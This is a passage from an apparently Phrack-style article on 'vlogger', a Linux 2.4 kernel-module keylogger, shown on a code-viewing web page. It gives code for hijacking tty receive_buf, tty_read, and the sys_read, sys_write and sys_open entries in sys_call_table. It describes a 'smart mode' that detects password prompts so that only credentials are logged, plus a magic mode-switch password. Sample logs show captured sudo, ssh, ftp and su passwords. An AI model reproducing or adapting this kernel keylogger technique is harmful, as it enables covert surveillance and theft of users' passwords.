📄 vlogger.txt
字号:
...}# /usr/include/linux/tty_ldisc.hstruct tty_ldisc { int magic; char *name; ... void (*receive_buf)(struct tty_struct *, const unsigned char *cp, char *fp, int count); int (*receive_room)(struct tty_struct *); void (*write_wakeup)(struct tty_struct *);}; To intercept this function, we can save the original tty receive_buf()function then set ldisc.receive_buf to our own new_receive_buf() functionin order to logging user inputs. Ex: to log inputs on the tty0int fd = open("/dev/tty0", O_RDONLY, 0);struct file *file = fget(fd);struct tty_struct *tty = file->private_data;old_receive_buf = tty->ldisc.receive_buf;tty->ldisc.receive_buf = new_receive_buf;void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, char *fp, int count){ logging(tty, cp, count); //log inputs /* call the original receive_buf */ (*old_receive_buf)(tty, cp, fp, count);}------[ 3.2.4 - tty_read This function is called when a process wants to read input charactersfrom a tty via sys_read() function.# /usr/src/linux/drives/char/tty_io.cstatic ssize_t tty_read(struct file * file, char * buf, size_t count, loff_t *ppos)static struct file_operations tty_fops = { llseek: tty_lseek, read: tty_read, write: tty_write, poll: tty_poll, ioctl: tty_ioctl, open: tty_open, release: tty_release, fasync: tty_fasync,};To log inputs on the tty0:int fd = open("/dev/tty0", O_RDONLY, 0);struct file *file = fget(fd); old_tty_read = file->f_op->read;file->f_op->read = new_tty_read;------[ 3.2.5 - sys_read/sys_write We will intercept sys_read/sys_write system calls to redirect it to ourown code which logs the content of the read/write calls. This method waspresented by halflife in Phrack 50 (see [4]). I highly recommend readingthat paper and a great article written by pragmatic called "Complete LinuxLoadable Kernel Modules" (see [2]).The code to intercept sys_read/sys_write will be something like this:extern void *sys_call_table[];original_sys_read = sys_call_table[__NR_read];sys_call_table[__NR_read] = new_sys_read;--[ 4 - vlogger This part will introduce my kernel keylogger which is used methoddescribed in section 3.2.3 to acquire more abilities than common keyloggersused sys_read/sys_write systemcall replacement approach. I have tested thecode with the following versions of linux kernel: 2.4.5, 2.4.7, 2.4.17 and2.4.18. ----[ 4.1 - The syscall/tty approach To logging both local (logged from console) and remote sessions, I chosethe method of intercepting receive_buf() function (see 3.2.3). In the kernel, tty_struct and tty_queue structures are dynamicallyallocated only when the tty is open. Thus, we also have to interceptsys_open syscall to dynamically hooking the receive_buf() function of eachtty or pty when it's invoked.// to intercept open syscalloriginal_sys_open = sys_call_table[__NR_open];sys_call_table[__NR_open] = new_sys_open;// new_sys_open()asmlinkage int new_sys_open(const char *filename, int flags, int mode){... // call the original_sys_open ret = (*original_sys_open)(filename, flags, mode); if (ret >= 0) { struct tty_struct * tty;... file = fget(ret); tty = file->private_data; if (tty != NULL && ... tty->ldisc.receive_buf != new_receive_buf) {... // save the old receive_buf old_receive_buf = tty->ldisc.receive_buf;... /* * init to intercept receive_buf of this tty * tty->ldisc.receive_buf = new_receive_buf; */ init_tty(tty, TTY_INDEX(tty)); }...}// our new receive_buf() functionvoid new_receive_buf(struct tty_struct *tty, const unsigned char *cp, char *fp, int count){ if (!tty->real_raw && !tty->raw) // ignore raw mode // call our logging function to log user inputs vlogger_process(tty, cp, count); // call the original receive_buf (*old_receive_buf)(tty, cp, fp, count);}----[ 4.2 - Features - Logs both local and remote sessions (via tty & pts) - Separate logging for each tty/session. Each tty has their own logging buffer. - Nearly support all special chars such as arrow keys (left, right, up, down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End, Home, Page Up, Page Down, BackSpace, ... - Support some line editing keys included CTRL-U and BackSpace. - Timestamps logging, timezone supported (ripped off some codes from libc). - Multiple logging modes o dumb mode: logs all keystrokes o smart mode: detects password prompt automatically to log user/password only. I used the similar technique presented in "Passive Analysis of SSH (Secure Shell) Traffic" paper by Solar Designer and Dug Song (see [6]). When the application turns input echoing off, we assume that it is for entering a password. o normal mode: disable loggingYou can switch between logging modes by using a magic password.#define VK_TOGLE_CHAR 29 // CTRL-]#define MAGIC_PASS "31337" // to switch mode, type MAGIC_PASS // then press VK_TOGLE_CHAR key----[ 4.3 - How to useChange the following options// directory to store log files#define LOG_DIR "/tmp/log"// your local timezone#define TIMEZONE 7*60*60 // GMT+7// your magic password#define MAGIC_PASS "31337" Below is how the log file looks like:[root@localhost log]# ls -ltotal 60-rw------- 1 root root 633 Jun 19 20:59 pass.log-rw------- 1 root root 37593 Jun 19 18:51 pts11-rw------- 1 root root 56 Jun 19 19:00 pts20-rw------- 1 root root 746 Jun 19 20:06 pts26-rw------- 1 root root 116 Jun 19 19:57 pts29-rw------- 1 root root 3219 Jun 19 21:30 tty1-rw------- 1 root root 18028 Jun 19 20:54 tty2---in dumb mode[root@localhost log]# head tty2 // local session<19/06/2002-20:53:47 uid=501 bash> pwd<19/06/2002-20:53:51 uid=501 bash> uname -a<19/06/2002-20:53:53 uid=501 bash> lsmod<19/06/2002-20:53:56 uid=501 bash> pwd<19/06/2002-20:54:05 uid=501 bash> cd /var/log<19/06/2002-20:54:13 uid=501 bash> tail messages<19/06/2002-20:54:21 uid=501 bash> cd ~<19/06/2002-20:54:22 uid=501 bash> ls<19/06/2002-20:54:29 uid=501 bash> tty<19/06/2002-20:54:29 uid=501 bash> [UP][root@localhost log]# tail pts11 // remote session <19/06/2002-18:48:27 uid=0 bash> cd new<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .<19/06/2002-18:48:21 uid=0 bash> lsmod<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/<19/06/2002-18:48:28 uid=0 bash> ls -l<19/06/2002-18:48:30 uid=0 bash> tail pts11<19/06/2002-18:48:38 uid=0 bash> [UP] | more<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt<19/06/2002-18:50:48 uid=0 vi> :q<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger---in smart mode[root@localhost log]# cat pass.log[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]USER/CMD sudo traceroute yahoo.comPASS 5hgt6dPASS [19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]USER/CMD ssh guest@host.comPASS guest[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]USER/CMD open ftp.ilog.frUSER AnonymousPASS heh@heh[19/06/2002-20:59:54 tty=pts/29 uid=504 su]USER/CMD su -PASS asdf1234Please check http://www.thehackerschoice.com/ for update on the new versionof this tool.--[ 5 - Greets Thanks to plasmoid, skyper for your very useful commentsGreets to THC, vnsecurity and all friendsFinally, thanks to mr. thang for english corrections--[ 6 - References[1] Linux Kernel Module Programming http://www.tldp.org/LDP/lkmpg/[2] Complete Linux Loadable Kernel Modules - Pragmatic http://www.thehackerschoice.com/papers/LKM_HACKING.html[3] The Linux keyboard driver - Andries Brouwer http://www.linuxjournal.com/lj-issues/issue14/1080.html[4] Abuse of the Linux Kernel for Fun and Profit - Halflife http://www.phrack.com/phrack/50/P50-05[5] Kernel function hijacking - Silvio Cesare http://www.big.net.au/~silvio/kernel-hijack.txt[6] Passive Analysis of SSH (Secure Shell) Traffic - Solar Designer http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt[7] Kernel Based Keylogger - Mercenary http://packetstorm.decepticons.org/UNIX/security/kernel.keylogger.txt|=[ EOF ]=---------------------------------------------------------------=|⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -